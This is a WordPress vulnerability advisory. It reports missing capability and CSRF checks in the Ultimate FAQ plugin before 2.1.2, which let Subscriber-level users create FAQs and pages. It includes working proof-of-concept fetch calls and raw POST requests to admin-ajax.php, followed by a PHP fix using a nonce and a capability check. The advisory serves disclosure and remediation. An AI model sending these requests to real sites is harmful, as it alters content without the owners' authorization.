wpvulndb | Krzysztof Zając | WPVDB-ID: F0A9E6CC-46CC-4AC2-927A-C006B8E8AA68
Dec 27, 2021 - 12:00 a.m.

Ultimate FAQ < 2.1.2 - Subscriber+ Arbitrary FAQ Creation

Source: wpscan.com
Tags: ultimate faq, arbitrary creation, authenticated users, capability, csrf checks

EPSS: 0.001 | Percentile: 21.4%

The plugin does not have capability and CSRF checks in the ewd_ufaq_welcome_add_faq and ewd_ufaq_welcome_add_faq_page AJAX actions, which are available to any authenticated user. As a result, any user with a role as low as Subscriber could create FAQs and FAQ questions.

PoC

Create a FAQ page (JavaScript, issued from the browser session of any authenticated user):

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "body": new URLSearchParams({ "action": "ewd_ufaq_welcome_add_faq_page", "faq_page_title": "hello" }),
  "method": "POST",
  "credentials": "include"
});

The equivalent raw request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close
Cookie: [any authenticated user]

action=ewd_ufaq_welcome_add_faq_page&faq_page_title=hello

The FAQ will be created as a page (/wp-admin/edit.php?post_type=page&orderby=date&order=desc).

Create a FAQ question:

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": { "content-type": "application/x-www-form-urlencoded" },
  "body": new URLSearchParams({ "action": "ewd_ufaq_welcome_add_faq", "faq_question": "Have you ever heard the wolf cry to the blue corn moon?", "faq_answer": "Yes" }),
  "method": "POST",
  "credentials": "include"
});

The equivalent raw request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 117
Connection: close
Cookie: [any authenticated user]

action=ewd_ufaq_welcome_add_faq&faq_question=Have+you+ever+heard+the+wolf+cry+to+the+blue+corn+moon%3F&faq_answer=Yes
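The server-side fix for this class of bug, as an added example that is not the plugin's own code: a WordPress AJAX handler for the ewd_ufaq_welcome_add_faq_page action that verifies a nonce (CSRF) and checks a capability (authorization) before creating the page, which is exactly what the vulnerable handlers skipped. The function names, script handle, nonce action name and the choice of the publish_pages capability are assumptions.

```php
<?php
// Added example, not the plugin's code. Names below are assumptions.

// 1) Issue a nonce to the admin page whose JavaScript calls admin-ajax.php.
//    The script must send it back as the _ajax_nonce POST field.
function ufaq_example_enqueue_welcome_script() {
    wp_enqueue_script( 'ufaq-example-welcome', plugins_url( 'welcome.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'ufaq-example-welcome', 'ufaqExample', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'ufaq_welcome_add_faq_page' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'ufaq_example_enqueue_welcome_script' );

// 2) The AJAX handler: CSRF check, then capability check, then work.
function ufaq_example_welcome_add_faq_page() {
    // Dies with HTTP 403 when the nonce is missing, stale or for another action,
    // so a cross-site form post from a logged-in user's browser is rejected.
    check_ajax_referer( 'ufaq_welcome_add_faq_page', '_ajax_nonce' );

    // Subscribers do not hold publish_pages, so the low-privilege path in the
    // advisory (a Subscriber creating a page) is closed here.
    if ( ! current_user_can( 'publish_pages' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Unslash and sanitize the only field this action accepts.
    $title = isset( $_POST['faq_page_title'] ) ? sanitize_text_field( wp_unslash( $_POST['faq_page_title'] ) ) : '';
    if ( '' === $title ) {
        wp_send_json_error( array( 'message' => 'Missing faq_page_title.' ), 400 );
    }

    $post_id = wp_insert_post( array(
        'post_type'    => 'page',
        'post_status'  => 'publish',
        'post_title'   => $title,
        'post_content' => '', // plugin-specific page body omitted in this example
    ), true );

    if ( is_wp_error( $post_id ) ) {
        wp_send_json_error( array( 'message' => $post_id->get_error_message() ), 500 );
    }
    wp_send_json_success( array( 'post_id' => $post_id ) );
}
// Registered only on the wp_ajax_ hook (logged-in users); never on wp_ajax_nopriv_.
add_action( 'wp_ajax_ewd_ufaq_welcome_add_faq_page', 'ufaq_example_welcome_add_faq_page' );
```

With both checks in place, the raw request in the PoC above fails at check_ajax_referer() before any capability or database code runs, and a request that does carry a valid nonce still fails for a Subscriber at current_user_can().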

